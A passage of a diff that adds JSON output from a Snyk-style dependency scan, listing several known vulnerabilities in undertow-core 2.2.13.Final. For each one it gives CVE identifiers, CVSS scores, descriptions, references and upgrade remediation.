"[,2.2.19.Final)", + "[2.3.0.Alpha1,2.3.0.Alpha2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.19.Final", + "2.3.0.Alpha2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1350", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095862", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2133", + "title": "Undertow Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:53.809517Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.519226Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:09.755888Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:53.809517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + 
"severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.519226Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when a `POST` request comes through `AJP` and the request exceeds the `max-post-size` limit (`maxEntitySize`). The `AjpServerRequestConduit` implementation closes a connection without sending any response to the `client/proxy` which will result in a front-end proxy marking the backend worker as an error state and not forward requests to the worker for a while.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.19.Final, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748)\n- [GitHub Commit](https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1350)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2095862)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2133)\n", + "epssDetails": { + "percentile": "0.36318", + "probability": "0.00084", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-2053" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-06-15T13:53:50.957525Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-06-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-06-15T15:07:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.519226Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.19.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3012383", + "title": "Denial of Service (DoS)", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.18)", + "[2.3.0.Alpha1,2.3.0.Alpha2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.18", + "2.3.0.Alpha2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1331", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073890", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2060", + "title": "Red Hat Issues" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:01.171825Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.199026Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:56.623925Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.171825Z" + }, + { + "type": "secondary", + 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.199026Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via an AJP 400 response, when EAP 7 is improperly sending two response packets, those packets have the reuse flag set even though JBoss EAP closes the connection. A failure occurs when the connection is reused after a 400 by `CPING` since it reads in the second `SEND_HEADERS` response packet instead of a `CPONG`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.18, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1331)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2073890)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2060)\n", + "epssDetails": { + "percentile": "0.71500", + "probability": "0.00335", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-1319" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-08-31T17:18:28.761846Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-08-31T17:13:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-08-31T17:18:28Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.199026Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.18.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3339519", + "title": "Improper Certificate Validation", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.24.Final)", + "[2.3.0.Alpha1,2.3.5.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.24.Final", + "2.3.5.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153260", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2022-4492", + "title": "RedHat CVE Database" + }, + { + "url": "https://issues.redhat.com/browse/MTA-93", + "title": "RedHat Issues" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:58.198807Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.706455Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:39.172740Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:58.198807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.706455Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Certificate Validation via the undertow client which does not check the server identity presented by the server certificate in https connections.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.24.Final, 2.3.5.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2153260)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2022-4492)\n- [RedHat Issues](https://issues.redhat.com/browse/MTA-93)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java)\n", + "epssDetails": { + "percentile": "0.35043", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-4492" + ], + "CWE": [ + "CWE-295" + ], + "GHSA": [ + "GHSA-pfcc-3g6r-8rg8" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2023-03-05T09:49:05.782717Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-23T21:30:16Z", + "exploitDetails": { + 
"sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2023-03-05T09:49:05.974241Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.706455Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.24.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3358786", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.25.Final)", + "[2.3.0.Alpha1,2.3.6.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.25.Final", + "2.3.6.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1477", + "title": "GitHub PR" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2137", + "title": "Undertow Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:01.060024Z" + }, + { + "assigner": "Red Hat", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.539446Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:20.874470Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.060024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.539446Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in flow control handling by the browser over HTTP/2. This may cause overhead or a denial of service in the server. This is due to an incomplete fix of [CVE-2021-3629](https://security.snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-2847922).\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.25.Final, 2.3.6.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1477)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2137)\n", + "epssDetails": { + "percentile": "0.46729", + "probability": "0.00120", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-1259" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2023-03-12T11:00:33.646508Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-12T10:57:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2023-03-12T11:00:33.868032Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.539446Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.25.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-6567186", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.32.Final)", + "[2.3.0.Alpha1,2.3.13.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.32.Final", + "2.3.13.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java%23L46", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-05T13:32:48.961817Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": 
"2024-05-13T12:05:39.932206Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-05T13:32:48.961817Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n", + "epssDetails": null, + "identifiers": { + "CVE": [ + "CVE-2023-1973" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-04-05T14:06:11.114809Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-04T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-04-05T14:06:11.299727Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-05-13T12:05:39.932206Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.32.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-6669948", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.31.Final)", + "[2.3.0.Alpha1,2.3.12.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.31.Final", + "2.3.12.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242099", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:13.170450Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-05-13T12:00:48.159973Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.170450Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java 
web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n", + "epssDetails": { + "percentile": "0.21648", + "probability": "0.00053", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-5379" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-04-21T07:43:26.561967Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-04-21T07:43:26.742123Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-05-13T12:00:48.159973Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.31.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": 
